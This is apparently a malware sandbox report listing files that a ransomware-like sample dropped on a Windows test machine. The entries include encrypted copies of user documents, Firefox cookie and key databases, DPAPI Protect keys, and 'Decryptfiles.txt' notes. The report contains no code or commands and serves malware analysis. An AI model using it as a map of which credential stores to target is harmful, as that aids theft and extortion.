C:\Users\user\_curlrc.uNYF
data
dropped
malicious
C:\Users\user\ntuser.dat.LOG1.cjKz
data
dropped
malicious
C:\Users\user\ntuser.dat.LOG1.puIz
data
dropped
malicious
C:\Users\user\ntuser.dat.LOG2.FdAV
data
dropped
malicious
C:\Users\user\ntuser.dat.LOG2.tObf
data
modified
malicious
C:\Users\user\ntuser.ini
data
dropped
malicious
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage user DataBase, version 0x620, checksum 0x66b629a6, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\Public\Libraries\RecordedTV.library-ms.WzIj (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.tLrR (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.OiLj (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl.npGz (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl.sVfx (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store.KeOu (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.sNid (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek.HVOS (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.qncC (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav.PYlZ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav.teqV (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06.vmwy (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST.sOji (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\3bb58c52-85cd-4424-83c3-47720a094118.bKqV (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred.OrxB (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\c6cd337d-cbfc-4f3d-88c4-6fd10913a1a0.okPN (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms.ufhc (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms.lVQa (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms.ShPy (copy)
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms.TkAd (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms.VCKl (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms.fjFl (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AUFZRAWBIW.png.KiCW (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms.hFlS (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms.YmlN (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BNAGMGSPLO.png.ZoQN (copy)
MPEG-4 LOAS, 4 or more streams
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.jpg
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.jpg.kTZy (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.xlsx.xShm (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.mp3.YvZq (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf.cKtC (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.xlsx.HJzw (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.png.UonT (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.docx
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.docx.ceZd (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.pdf
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.pdf.OAHV (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EIVQSAOTAQ.jpg.pVsK (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.docx.gRLx (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.mp3.PmJs (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.docx.tZhU (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.pdf.DlrP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.png.iIjQ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GRXZDKKVDB.png
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GRXZDKKVDB.png.VDCp (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HVLFEFMHHB.png.yike (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYCBOPHQBT.jpg
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYCBOPHQBT.jpg.QjAL (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KGUUUSONWY.mp3.csdO (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.jpg.kMsv (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.mp3
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.mp3.SHdK (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf.MKGm (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.mp3
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.mp3.kbXS (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.jpg.tzyh (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.xlsx.epBN (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf.wIYr (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.jpg.mNlr (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.mp3
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.mp3.NMYH (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.pdf.uAhJ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.docx.zMvk (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.jpg.lpLb (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.xlsx
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.xlsx.LjQt (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.docx.TuJp (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.xlsx.qeut (copy)
OpenPGP Public Key Version 7
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCFWYSKMHA.docx.YxtN (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx.KRvx (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.jpg.mAbp (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.mp3.xbaz (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.pdf.EQVl (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.xlsx.vNlY (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.docx.OxTZ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.pdf
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.pdf.RiQb (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TQDFJHPUIU.png.NyvD (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZGGKNSUKOP.png.YwEB (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZIPXYXWIOY.mp3.xPvB (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK.Oewm (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.aNtw (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.FbeM (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.KjSZ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.aHcM (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.iQyp (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.WbXP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\times.json.AEYU (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\AlternateServices.txt.XKfi (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ExperimentStoreData.json.QOVf (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\SiteSecurityServiceState.txt.lUvu (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4.zrRw (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.json.ESGz (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db.rYtu (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini.jOVm (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\containers.json.dVLN (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite.wuOD (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm.xtfY (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite.fTNb (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832118.b6281059-34c6-49d8-97c7-24de33b104ab.new-profile.jsonlz4.nOPz (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832120.4cb4db2a-ee68-4128-8ff4-f04bdc710c24.event.jsonlz4.PeDX (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832123.3eb2db8e-f770-4c52-9d7b-27180bea4925.main.jsonlz4.XYFb (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832124.b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.first-shutdown.jsonlz4.LOMZ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838393.b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.health.jsonlz4.bzUJ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838409.7e03a685-c52e-4810-b494-0f433b33ac49.event.jsonlz4.ODpn (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838410.75265401-2d75-4127-a70f-7d6e61df69a0.health.jsonlz4.yZep (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838415.86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.main.jsonlz4.vGPL (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.bin.qUZj (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\background-update.dBce (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\events.vzMK (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\4db4139f-6dcf-40ae-89c1-1ca4ca5a35ed.pxDL (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\8940dc38-b85f-4355-b090-8e4e300a9627.CVFc (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b38522d7-1787-4855-a312-c27916e30610.qHsm (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b3e287d1-bcec-4242-9158-4e1296363490.SPWl (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\dd74a7e7-e73b-4ab9-8964-ca5c53c60966.ehIM (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\session-state.json.ivSj (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\state.json.mvuG (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extension-preferences.json.rZKM (copy)
zlib compressed data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extensions.json.RkSs (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shm.SnxI (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite.xevd (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\handlers.json.rXlM (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db.BkFv (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite.ZIjc (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txt.QpNo (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm.TUCr (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite.WVBE (copy)
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js.VLXF (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite.qTtP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\3eb2db8e-f770-4c52-9d7b-27180bea4925.iMbU (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\4cb4db2a-ee68-4128-8ff4-f04bdc710c24.aKjk (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\75265401-2d75-4127-a70f-7d6e61df69a0.ItEo (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\7e03a685-c52e-4810-b494-0f433b33ac49.eGBp (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.EhgA (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6281059-34c6-49d8-97c7-24de33b104ab.YFMO (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.LwtW (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.KPUv (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\search.json.mozlz4.zKql (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json.HejR (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\previous.jsonlz4.fVxs (copy)
SysEx File -
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528.XTKI (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore.jsonlz4.DZcJ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\shield-preference-experiments.json
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\shield-preference-experiments.json.jBxi (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite.wqIZ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite.EAKu (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\.metadata-v2.stqu (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm.zfRr (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.cgxv (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm.TZCu (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.rnay (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm.eKXZ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite.JwGW (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm.pIwu (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite.ZohB (copy)
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm.MnmD (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.XsHY (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm.vAJd (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite.PZJc (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.json.ijIb (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\times.json.NcDG (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shm.RGAt (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite.RTAF (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini.jDnR (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.xMod (copy)
data
dropped
C:\Users\user\Desktop\BNAGMGSPLO.png.ldXh (copy)
data
dropped
C:\Users\user\Desktop\EFOYFBOLXA.pdf.jLOH (copy)
data
dropped
C:\Users\user\Desktop\GIGIYTFFYT.mp3.bozc (copy)
data
dropped
C:\Users\user\Desktop\GRXZDKKVDB.png.YiBf (copy)
data
dropped
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs.IuxW (copy)
data
dropped
C:\Users\user\Desktop\NVWZAPQSQL.jpg.hJsc (copy)
data
dropped
C:\Users\user\Desktop\NVWZAPQSQL.xlsx.RMxp (copy)
data
dropped
C:\Users\user\Desktop\PALRGUCVEH.jpg.sMfp (copy)
data
dropped
C:\Users\user\Desktop\PALRGUCVEH.mp3.lFzB (copy)
data
dropped
C:\Users\user\Desktop\PALRGUCVEH.pdf.CnYs (copy)
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV.docx.AvIQ (copy)
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV.jpg.MGpE (copy)
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV.xlsx.FPSw (copy)
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.jpg.PqND (copy)
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV\NVWZAPQSQL.xlsx.DWdi (copy)
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV\PALRGUCVEH.pdf.obFM (copy)
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx.uOLw (copy)
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV\TQDFJHPUIU.png
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV\TQDFJHPUIU.png.GrMv (copy)
data
dropped
C:\Users\user\Desktop\PIVFAGEAAV\ZIPXYXWIOY.mp3.eaoc (copy)
data
dropped
C:\Users\user\Desktop\PWCCAWLGRE.docx.UMCd (copy)
data
dropped
C:\Users\user\Desktop\PWCCAWLGRE.xlsx.qxWV (copy)
data
dropped
C:\Users\user\Desktop\PWCCAWLGRE\GRXZDKKVDB.png.PafQ (copy)
data
dropped
C:\Users\user\Desktop\PWCCAWLGRE\NVWZAPQSQL.jpg.wmBJ (copy)
data
dropped
C:\Users\user\Desktop\PWCCAWLGRE\PALRGUCVEH.mp3.rOlI (copy)
data
dropped
C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.xlsx
data
dropped
C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.xlsx.LkfH (copy)
data
dropped
C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx.Aujp (copy)
data
dropped
C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.pdf.klmt (copy)
data
dropped
C:\Users\user\Desktop\QCFWYSKMHA.docx.OlAT (copy)
OpenPGP Secret Key
dropped
C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.png
data
dropped
C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.png.SuBC (copy)
data
dropped
C:\Users\user\Desktop\QCFWYSKMHA\PIVFAGEAAV.jpg
data
dropped
C:\Users\user\Desktop\QCFWYSKMHA\PIVFAGEAAV.jpg.Jmvl (copy)
data
dropped
C:\Users\user\Desktop\QCFWYSKMHA\PWCCAWLGRE.xlsx
data
dropped
C:\Users\user\Desktop\QCFWYSKMHA\PWCCAWLGRE.xlsx.Enjo (copy)
data
dropped
C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx
data
dropped
C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx.zdiR (copy)
data
dropped
C:\Users\user\Desktop\QCFWYSKMHA\SQSJKEBWDT.mp3.SPqH (copy)
data
dropped
C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.pdf.vgtM (copy)
data
dropped
C:\Users\user\Desktop\SQSJKEBWDT.mp3
data
dropped
C:\Users\user\Desktop\SQSJKEBWDT.mp3.OCcK (copy)
data
dropped
C:\Users\user\Desktop\SQSJKEBWDT.pdf.MtDa (copy)
data
dropped
C:\Users\user\Desktop\SQSJKEBWDT.xlsx
data
dropped
C:\Users\user\Desktop\SQSJKEBWDT.xlsx.EZOu (copy)
data
dropped
